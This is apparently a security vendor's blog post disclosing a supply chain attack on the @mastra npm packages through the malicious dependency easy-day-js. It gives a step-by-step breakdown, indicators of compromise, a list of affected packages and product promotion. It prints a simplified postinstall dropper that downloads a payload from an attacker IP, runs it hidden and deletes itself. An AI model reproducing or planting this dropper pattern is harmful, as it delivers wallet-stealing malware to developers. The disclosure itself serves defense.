Over 140 popular Mastra npm Packages Hit by Supply Chain Attack

A supply chain attack compromised over 140 npm packages in the @mastra scope, including @mastra/core with 918K weekly downloads, by injecting a malicious dependency that executes a postinstall script to deploy crypto wallet-stealing malware. The attack mirrors the March 2026 axios compromise, using a clean decoy version followed by a malicious update that fetches a second-stage payload from a Hostwinds C2 server targeting over 160 browser-based crypto wallet extensions.

On June 17th we detected a large-scale supply chain attack targeting the entire @mastra npm scope, a popular open-source AI agent framework. An attacker republished 141 packages in a burst between 01:15 and 02:00 UTC, silently injecting a malicious dependency into every one of them. The affected packages include @mastra/core , which has 918K weekly npm downloads, as well as mastra and create-mastra . The postinstall script All 141 packages had a single new dependency added to their package.json : easy-day-js , a malicious clone of the popular date library dayjs . The package was published by a separate attacker-controlled account a day before the scope takeover. Crucially, the initial release 1.11.21 was completely clean, a straight copy of dayjs with no install hooks. The malicious version 1.11.22 followed the next day, right around the time the @mastra packages were republished. The compromised packages depend on ^1.11.21 , but npm's caret resolution automatically pulls in the malicious 1.11.22 as the latest version, while auditing the pinned version reveals nothing suspicious. Version 1.11.22 adds a postinstall hook that runs setup.cjs , an obfuscated script that executes automatically at install time without any user interaction. js // obfuscated -- stripped down to the essential logic const payload = await await fetch 'https://23 . 254 . 164 . 92:8000/update/49890878' .text ; const file = path.join os.tmpdir , crypto.randomBytes 12 .toString 'hex' + '.js' ; fs.writeFileSync file, payload, 'utf8' ; child process.spawn process.execPath, file, '23 . 254 . 164 . 123:443' , { detached: true, stdio: 'ignore', windowsHide: true } .unref ; fs.rmSync filename, { force: true } ; // self-deletes What this script does, step by step: - Fetches a second-stage payload from the C2 server at 23 . 254 . 164 . 92:8000 - Writes the payload to a randomly named .js file in the OS temp directory - Spawns the payload as a fully detached background process, invisible on all platforms stdio: ignore, windowsHide: true , passing a second C2 host 23 . 254 . 164 . 123:443 as an argument - Self-deletes to remove forensic evidence of the postinstall hook The second stage runs as a long-lived background process that collects system information and targets over 160 browser-based crypto wallet extensions, including MetaMask, Keplr, Coinbase, and more. It establishes persistence by disguising itself as node-related tools on macOS, Windows, and Linux, all phoning home to 23 . 254 . 164 . 123:443 . Similarities with the axios compromise The playbook here is nearly identical to the axios compromise https://www.aikido.dev/blog/axios-npm-compromised-maintainer-hijacked-rat we covered in March 2026. In both attacks, the attacker avoided touching the target package's own code and instead injected a malicious dependency, relying on npm's postinstall hook to execute the payload automatically at install time. Both staged a clean decoy version first, then followed with the malicious one. In the axios attack, plain-crypto-js played the role that easy-day-js plays here. Both droppers also self-delete after execution to remove forensic evidence. The infrastructure also follows the same pattern. The axios dropper called back to a Hostwinds VPS on port 8000. The easy-day-js dropper does the same, hitting 23 . 254 . 164 . 92:8000 on Hostwinds infrastructure. How Aikido detects this If you are an Aikido user, check your central feed and filter on malware issues. This will surface as a 100/100 critical issue. Aikido rescans nightly, but we recommend triggering a manual rescan now. If you are not yet an Aikido user, you can create an account https://app.aikido.dev/login and connect your repos. Our malware coverage is included in the free plan, no credit card required. For broader coverage across your whole team, Aikido's Device Protection https://www.aikido.dev/protect/device-protection gives you visibility and control over the software packages installed on your team's devices. It covers browser extensions, code libraries, IDE plugins, and build dependencies, all in one place. Stop malware before it gets installed. For future protection, consider Aikido Safe Chain https://github.com/AikidoSec/safe-chain open source . Safe Chain sits in your existing workflow, intercepting npm, npx, yarn, pnpm, and pnpx commands and checking packages against Aikido Intel https://intel.aikido.dev/ before install. Indicators of Compromise Network indicators 23 . 254 . 164 . 92:8000 — first-stage C2, payload download 23 . 254 . 164 . 123:443 — second-stage callback host, passed to the spawned RAT Affected packages easy-day-js@1.11.22 create-mastra@1.13.1 mastra@1.13.1 @mastra/acp@0.2.2 @mastra/agent-browser@0.3.2 @mastra/agent-builder@1.0.42 @mastra/agentcore@0.2.2 @mastra/agentfs@0.1.1 @mastra/ai-sdk@1.4.6 @mastra/arize@1.2.3 @mastra/arthur@0.3.3 @mastra/astra@1.0.2 @mastra/auth@1.0.3 @mastra/auth-auth0@1.0.2 @mastra/auth-better-auth@1.0.4 @mastra/auth-clerk@1.0.3 @mastra/auth-cloud@1.1.4 @mastra/auth-firebase@1.0.1 @mastra/auth-okta@0.0.5 @mastra/auth-studio@1.2.4 @mastra/auth-supabase@1.0.2 @mastra/auth-workos@1.5.3 @mastra/azure@0.2.3 @mastra/blaxel@0.4.2 @mastra/braintrust@1.1.4 @mastra/brightdata@0.2.2 @mastra/browser-firecrawl@0.1.1 @mastra/browser-viewer@0.1.3 @mastra/chroma@1.0.2 @mastra/claude@1.0.3 @mastra/clickhouse@1.10.1 @mastra/client-js@1.24.1 @mastra/cloud@0.1.24 @mastra/cloudflare@1.4.2 @mastra/cloudflare-d1@1.0.7 @mastra/codemod@1.0.4 @mastra/convex@1.2.2 @mastra/core@1.42.1 @mastra/couchbase@1.0.4 @mastra/cursor@0.2.1 @mastra/dane@1.0.2 @mastra/datadog@1.2.5 @mastra/daytona@0.4.2 @mastra/deployer@1.42.1 @mastra/deployer-cloud@1.42.1 @mastra/deployer-cloudflare@1.1.44 @mastra/deployer-netlify@1.1.20 @mastra/deployer-vercel@1.1.38 @mastra/docker@0.3.1 @mastra/dsql@1.0.3 @mastra/duckdb@1.4.3 @mastra/dynamodb@1.0.9 @mastra/e2b@0.3.4 @mastra/editor@0.11.3 @mastra/elasticsearch@1.2.1 @mastra/engine@0.1.1 @mastra/evals@1.3.1 @mastra/express@1.3.31 @mastra/fastembed@1.1.3 @mastra/fastify@1.3.31 @mastra/files-sdk@0.2.1 @mastra/gcs@0.2.3 @mastra/github-signals@0.1.2 @mastra/google-cloud-pubsub@1.0.6 @mastra/google-drive@0.1.1 @mastra/hono@1.4.26 @mastra/inngest@1.5.2 @mastra/koa@1.5.14 @mastra/laminar@1.2.3 @mastra/lance@1.0.7 @mastra/langfuse@1.3.6 @mastra/langsmith@1.2.4 @mastra/libsql@1.13.1 @mastra/loggers@1.1.3 @mastra/longmemeval@1.0.50 @mastra/mcp@1.10.1 @mastra/mcp-docs-server@1.1.47 @mastra/mcp-registry-registry@1.0.2 @mastra/mem0@0.1.14 @mastra/memory@1.20.4 @mastra/modal@0.2.2 @mastra/mongodb@1.9.3 @mastra/mssql@1.3.2 @mastra/mysql@0.1.1 @mastra/nestjs@0.1.15 @mastra/node-audio@0.1.8 @mastra/node-speaker@0.1.1 @mastra/observability@1.14.2 @mastra/openai@1.0.2 @mastra/opencode@0.0.47 @mastra/opensearch@1.0.3 @mastra/otel-bridge@1.2.3 @mastra/otel-exporter@1.2.3 @mastra/perplexity@0.1.1 @mastra/pg@1.13.1 @mastra/pinecone@1.0.2 @mastra/playground-ui@33.0.1 @mastra/posthog@1.0.29 @mastra/qdrant@1.0.3 @mastra/rag@2.2.2 @mastra/railway@0.1.1 @mastra/react@1.0.1 @mastra/redis@1.1.3 @mastra/redis-streams@0.0.4 @mastra/s3@0.5.3 @mastra/s3vectors@1.0.7 @mastra/schema-compat@1.2.12 @mastra/sentry@1.1.4 @mastra/server@2.1.1 @mastra/slack@1.3.1 @mastra/spanner@1.1.2 @mastra/speech-azure@0.2.1 @mastra/speech-elevenlabs@0.2.1 @mastra/speech-google@0.2.1 @mastra/speech-ibm@0.2.1 @mastra/speech-murf@0.2.1 @mastra/speech-openai@0.2.1 @mastra/speech-replicate@0.2.1 @mastra/speech-speechify@0.2.1 @mastra/stagehand@0.2.5 @mastra/tavily@1.0.3 @mastra/temporal@0.1.14 @mastra/turbopuffer@1.0.3 @mastra/twilio@1.0.2 @mastra/upstash@1.1.3 @mastra/vectorize@1.0.3 @mastra/vercel@1.0.1 @mastra/voice-aws-nova-sonic@0.1.4 @mastra/voice-azure@0.11.2 @mastra/voice-cloudflare@0.12.3 @mastra/voice-deepgram@0.12.2 @mastra/voice-elevenlabs@0.12.2 @mastra/voice-gladia@0.12.2 @mastra/voice-google@0.12.3 @mastra/voice-google-gemini-live@0.12.2 @mastra/voice-inworld@0.3.1 @mastra/voice-modelslab@0.1.2 @mastra/voice-murf@0.12.3 @mastra/voice-openai@0.12.3 @mastra/voice-openai-realtime@0.12.6 @mastra/voice-playai@0.12.2 @mastra/voice-sarvam@1.0.2 @mastra/voice-speechify@0.12.2 @mastra/voice-xai-realtime@0.1.2